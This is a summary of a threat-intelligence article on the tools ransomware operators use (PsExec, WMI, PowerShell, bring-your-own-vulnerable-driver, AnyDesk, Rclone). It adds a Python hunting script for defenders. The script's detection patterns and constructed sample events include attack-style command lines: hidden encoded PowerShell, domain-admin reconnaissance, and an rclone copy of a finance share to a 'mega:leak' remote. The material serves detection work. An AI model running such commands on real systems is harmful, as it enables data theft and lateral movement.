Short Summary:
The article discusses various tools and techniques used by attackers in the context of ransomware operations. It categorizes these tools into four main areas: Living off the Land, Impairing Defenses, Remote Desktop/Remote Admin, and Data Exfiltration. The article also highlights the growing robustness of the ransomware ecosystem and suggests visiting the Symantec Protection Bulletin for the latest protection updates.
Key Points:
- Living off the Land: Abuses Windows-native and administrative utilities such as PsExec and WMI for lateral movement and remote command execution.
- Impairing Defenses: Attackers deploy signed vulnerable drivers to disable security software.
- Remote Desktop/Remote Admin: Legitimate tools such as RDP and AnyDesk are abused for persistent backdoor access.
- Data Exfiltration: Ransomware groups often steal data before encryption, using tools like Rclone.
- Robust Ecosystem: The rise of new ransomware operations may lead to a more resilient ecosystem.
- Protection/Mitigation: For updates on protection measures, refer to the Symantec Protection Bulletin.
MITRE ATT&CK TTPs – created by AI
- Living off the Land
- PsExec for lateral movement over SMB/Windows Admin Shares (T1021.002); WMI for remote command execution (T1047).
- PowerShell for executing commands, downloading payloads, and reconnaissance (T1059.001).
- Impairing Defenses (T1562.001, Impair Defenses: Disable or Modify Tools)
- Deployment of signed vulnerable drivers (BYOVD) to terminate security software.
- Remote Access Software (T1219) and Remote Desktop Protocol (T1021.001)
- Abuse of RDP, AnyDesk, Splashtop, and ScreenConnect for backdoor access.
- Data Exfiltration (T1567.002, Exfiltration to Cloud Storage)
- Use of Rclone, and the transfer features built into remote admin tools, for data theft prior to encryption.
These tools fall mostly into four categories:
Living off the Land: Utilities that are native to the Windows environment, or routinely present on it, that an attacker can turn to their own ends. PsExec (a Microsoft Sysinternals utility) and WMI let attackers move laterally across a network and execute commands on remote machines. PowerShell, meanwhile, is a powerful scripting engine that can run commands, download payloads, move laterally, and carry out reconnaissance.
Impairing Defenses: A growing number of attackers are using tools that rely on the Bring Your Own Vulnerable Driver (BYOVD) technique. The attacker deploys a legitimately signed but vulnerable driver to the target network and abuses it to kill security software. Because drivers run in kernel mode, a driver that exposes an arbitrary process-termination or kernel-memory-write primitive lets a user-mode program terminate processes that endpoint protection would otherwise shield. In most cases the vulnerable driver is deployed alongside a malicious executable that loads it and issues the commands, typically through the driver's IOCTL interface.
Remote Desktop/Remote Admin: While these software packages are used legitimately for remote administration or tech support, attackers are turning to them because they effectively provide backdoor access to a machine. Tools such as RDP, AnyDesk, Splashtop, and ScreenConnect are frequently deployed by ransomware actors.
Data Exfiltration: Most ransomware groups carry out double-extortion attacks, stealing data from a victim’s network prior to encryption and using the threat of leaking that stolen data as an additional form of leverage. Rclone is the most frequently used exfiltration tool. Many of the remote admin packages used by ransomware actors also have exfiltration capabilities.
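The four categories above map onto a handful of concrete telemetry signals, and the following Python hunt is an added illustration of them, not code from the Symantec article. It runs one rule per category over constructed records shaped like Sysmon process-creation events and System-log 7045 service installs: PsExec's PSEXESVC service, processes spawned by WmiPrvSE.exe, PowerShell with hidden/encoded options, kernel drivers loaded from untrusted paths or matching a block-list hash, remote admin binaries identified by their PE OriginalFileName (so renaming on disk does not hide them), and rclone-style transfers to a cloud remote. The record layout, the service and driver names, the block-list hash, the remote-admin name list and the assumption that SystemRoot is C:\Windows are all illustrative choices.

```python
"""Hunting rules for the four ransomware tool categories, run over constructed
Windows/Sysmon-style event records. Added illustration, not Symantec's code:
the records, service and driver names, and the block-list hash are made up."""
import hashlib
import re
from pathlib import PureWindowsPath

# Hypothetical block list. In production use Microsoft's vulnerable driver
# blocklist or the LOLDrivers hash set instead of this made-up entry.
VULN_DRIVER_SHA256 = {hashlib.sha256(b"hypothetical vulnerable driver").hexdigest()}
# Illustrative subset of remote admin tools keyed by PE OriginalFileName;
# extend with the vendor-documented binary names for Splashtop and others.
REMOTE_ADMIN = {"anydesk.exe", "screenconnect.clientservice.exe"}
TRUSTED_DRIVER_DIRS = ("c:\\windows\\system32\\drivers", "c:\\windows\\system32\\driverstore")
# rclone targets look like "remote:path"; drive letters (C:\) and URLs (https://) are excluded.
RCLONE_REMOTE = re.compile(r"(?<![\w\\])[a-z][\w-]+:(?![\\/])\S", re.I)
RCLONE_VERB = re.compile(r"\b(copy|sync|move)\b", re.I)
PS_SUSPICIOUS = re.compile(
    r"-(enc(odedcommand)?|w(indowstyle)?\s+hidden|nop|noprofile)\b|downloadstring|invoke-webrequest", re.I)


def _base(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def _driver_path(image: str) -> str:
    # Normalise a 7045 ImagePath: drop the "\??\" prefix and resolve the relative
    # "system32\drivers\x.sys" form (SystemRoot assumed to be C:\Windows).
    p = image.lower()
    p = p[4:] if p.startswith("\\??\\") else p
    return p if ":" in p else "c:\\windows\\" + p


def check_process(ev: dict) -> list:
    image, orig = _base(ev["image"]), ev.get("orig", "").lower()
    parent, cmd = _base(ev.get("parent", "")), ev.get("cmd", "")
    hits = []
    if parent == "wmiprvse.exe":  # remote WMI Win32_Process.Create lands here
        hits.append(("Living off the Land", "T1047", f"{image} spawned by WmiPrvSE.exe"))
    if orig == "powershell.exe" and PS_SUSPICIOUS.search(cmd):
        hits.append(("Living off the Land", "T1059.001", "PowerShell with hidden/encoded/download options"))
    if orig in REMOTE_ADMIN:
        hits.append(("Remote Desktop/Remote Admin", "T1219", f"{orig} running as {image}"))
    if orig == "rclone.exe" or (RCLONE_VERB.search(cmd) and RCLONE_REMOTE.search(cmd)):
        hits.append(("Data Exfiltration", "T1567.002", "rclone-style transfer to a cloud remote"))
    if orig and image != orig:  # OriginalFileName survives a rename on disk
        hits.append(("Evasion", "T1036", f"{image} is really {orig}"))
    return hits


def check_service(ev: dict) -> list:
    hits = []
    if ev.get("service", "").lower() == "psexesvc" or _base(ev["image"]) == "psexesvc.exe":
        hits.append(("Living off the Land", "T1021.002", "PsExec service (PSEXESVC) installed"))
    if ev.get("driver"):
        path = _driver_path(ev["image"])
        if not path.startswith(TRUSTED_DRIVER_DIRS):
            hits.append(("Impairing Defenses", "T1562.001", f"kernel driver loaded from {path}"))
        if ev.get("sha256") in VULN_DRIVER_SHA256:
            hits.append(("Impairing Defenses", "T1562.001", "driver hash is on the vulnerable-driver block list"))
    return hits


def hunt(events: list) -> list:
    """Run every rule over the records and return one dict per finding."""
    findings = []
    for i, ev in enumerate(events):
        checker = check_service if ev["event"] == "service" else check_process
        for category, technique, detail in checker(ev):
            findings.append({"event": i, "category": category, "technique": technique, "detail": detail})
    return findings


def summarize(findings: list) -> dict:
    counts = {}
    for f in findings:
        counts[f["category"]] = counts.get(f["category"], 0) + 1
    return counts


# Constructed records: "process" mimics Sysmon event 1 fields, "service" the System log 7045.
EVENTS = [
    {"event": "service", "service": "PSEXESVC", "image": r"%SystemRoot%\PSEXESVC.exe", "driver": False},
    {"event": "process", "image": r"C:\Windows\System32\cmd.exe", "orig": "Cmd.Exe",
     "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "cmd": 'cmd.exe /c net group "domain admins" /domain'},
    {"event": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "orig": "PowerShell.EXE",
     "parent": r"C:\Windows\System32\cmd.exe", "cmd": "powershell -nop -w hidden -enc SQBFAFgAIAAoAE4A"},
    {"event": "service", "service": "drvtool", "image": r"\??\C:\Users\Public\drvtool.sys", "driver": True,
     "sha256": hashlib.sha256(b"hypothetical vulnerable driver").hexdigest()},
    {"event": "process", "image": r"C:\ProgramData\svc.exe", "orig": "AnyDesk.exe",
     "parent": r"C:\Windows\explorer.exe", "cmd": "svc.exe --service"},
    {"event": "process", "image": r"C:\ProgramData\r.exe", "orig": "rclone.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": r'r.exe copy "\\FS01\Finance" mega:leak --transfers 32 --no-check-certificate'},
    {"event": "process", "image": r"C:\Windows\System32\svchost.exe", "orig": "svchost.exe",
     "parent": r"C:\Windows\System32\services.exe", "cmd": "svchost.exe -k netsvcs"},  # benign
    {"event": "service", "service": "usbccgp", "image": r"system32\DRIVERS\usbccgp.sys", "driver": True},  # benign
]

if __name__ == "__main__":
    for f in hunt(EVENTS):
        print(f"[{f['category']}] {f['technique']}: {f['detail']} (record {f['event']})")
```

Two design points matter in practice: the PsExec rule keys on the default service name, so an operator using PsExec's -r option to rename the service only trips the rule if the ImagePath still ends in PSEXESVC.exe; and the driver rule is a path heuristic plus a hash lookup, so a signed vulnerable driver dropped into System32\drivers with a hash not yet on the block list passes. Both are why a hunt like this complements, rather than replaces, a kernel-mode driver block policy and RDP logon-type monitoring.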
Robust ecosystem
The growth of ransomware operations such as RansomHub and Qilin to rival LockBit isn’t welcome news, as it may make the ransomware ecosystem more robust and less likely to experience major disruption should a dominant operator be taken down or go offline.
Protection/Mitigation
For the latest protection updates, please visit the Symantec Protection Bulletin.
Source: Original Post